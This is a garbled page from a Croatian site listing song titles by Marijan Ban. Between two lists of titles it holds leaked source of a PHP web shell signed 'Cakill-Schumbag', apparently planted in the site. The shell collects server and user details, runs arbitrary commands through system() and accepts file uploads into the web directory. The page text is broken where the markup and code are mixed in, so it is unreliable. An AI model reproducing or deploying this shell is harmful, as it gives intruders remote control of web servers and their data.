Naslovnica
Marijan Ban
Pjesme

 

Bila boja
Di si ti
Lažne žene
Morska milka
Noæ je prekrasna
Ona vi¹e nije bila tu
Oti¹la je moja draga
Ruzinavi brod
Su¹ac blues
Tonka
U autobusu
Ulicama noæu
Veliki brod

Zrinka

cakill schumbag
Created By cakill-schumbag

body{text:#999999;bgcolor:#000000;font-family:tahoma ms;font-size:15px;}hr{width:100%;height:2px;}"; print "

thank's 4all keluarga laknat

"; print "

"; closelog( ); $user = get_current_user( ); $login = posix_getuid( ); $euid = posix_geteuid( ); $ver = phpversion( ); $gid = posix_getgid( ); if ($chdir == "") $chdir = getcwd( ); if(!$whoami)$whoami=exec("whoami"); ?>
:
User Info: uid=() euid=() gid=()
Server Services:
Permision Directory:
Server Address:
Current User:
PHP Version:


"; print ""; print ""; print ""; print ""; print ""; print ""; print ""; print ""; print "
Command:
Directory:
Upload file:
Find:


"; $currentCMD = str_replace("\\\"","\"",$currentCMD); $currentCMD = str_replace("\\\'","\'",$currentCMD); if( $_POST['_act'] == "Upload" ) { if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { print "
Error Upload Failed!!!
"; } else { print "
";
    system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
    print "
Upload File Succes!!!
"; } } else { print "\n\n\n
\n";
  $currentCMD = "cd ".$currentWD.";".$currentCMD;
 system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
  print "\n
\n\n\n

Cakill-Schumbag
"; } exit; ?>

Bude me
Hrvatska čigra
Mojoj lijepoj
Mrlje
Oči zaljubljene
One bi htjele
Ovo nije moje vrijeme
Slavuj
Ti nisi tu
Tumba
U modroj zori
Umorni mornari stari
Zrinka